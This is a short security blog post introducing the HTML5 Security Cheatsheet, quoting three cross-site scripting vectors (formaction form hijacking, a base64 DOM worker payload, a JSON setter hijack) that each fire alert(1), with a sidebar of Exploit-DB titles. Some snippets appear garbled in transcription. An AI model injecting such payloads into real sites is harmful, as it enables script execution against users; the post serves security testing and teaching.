darksecurity.de | Entries tagged as cheat sheet

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

Entries tagged as cheat sheet

HTML5 Security Cheatsheet

Posted by Stefan Schurtz on Sunday, December 1. 2013

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

Self-including DOM Worker XSS

A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution

0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))

Self-hijacking JSON literals

In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.

<script>[{‘a’:Object.prototype.defineSetter(‘b’,function(){alert(arguments[0])}),‘b’:[‘secret’]}]</script>

Sidebar

Calendar

Werbung

Exploit-DB updates by Offensive Security

[local] Microsoft Windows 11 - Kernel Privilege Escalation

Tuesday, April 22. 2025

[webapps] WordPress Core 6.2 - Directory Traversal

Tuesday, April 22. 2025

[remote] Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution

Tuesday, April 22. 2025

[remote] code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)

Tuesday, April 22. 2025

[remote] WonderCMS 3.4.2 - Remote Code Execution (RCE)

Tuesday, April 22. 2025

OpenBSD Journal

Introducing an OpenBSD LLDP daemon

Friday, April 25. 2025

Introducing bpflogd(8): capture packets via BPF to log files

Friday, April 25. 2025

Game of Trees 0.111 released

Thursday, April 24. 2025

Graphed and measured: running TCP input in parallel

Friday, April 18. 2025

rpki-client 9.5 released

Saturday, April 12. 2025

OpenBSD -current is now "7.7-current"

Saturday, April 12. 2025

OpenIKED 7.4 Released

Friday, April 11. 2025

OpenSSH 10.0 Released

Thursday, April 10. 2025

New sysctl(8) -f option supports reading entire settings file in one go

Tuesday, April 8. 2025

Archives

Blog Administration

Open login screen

Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170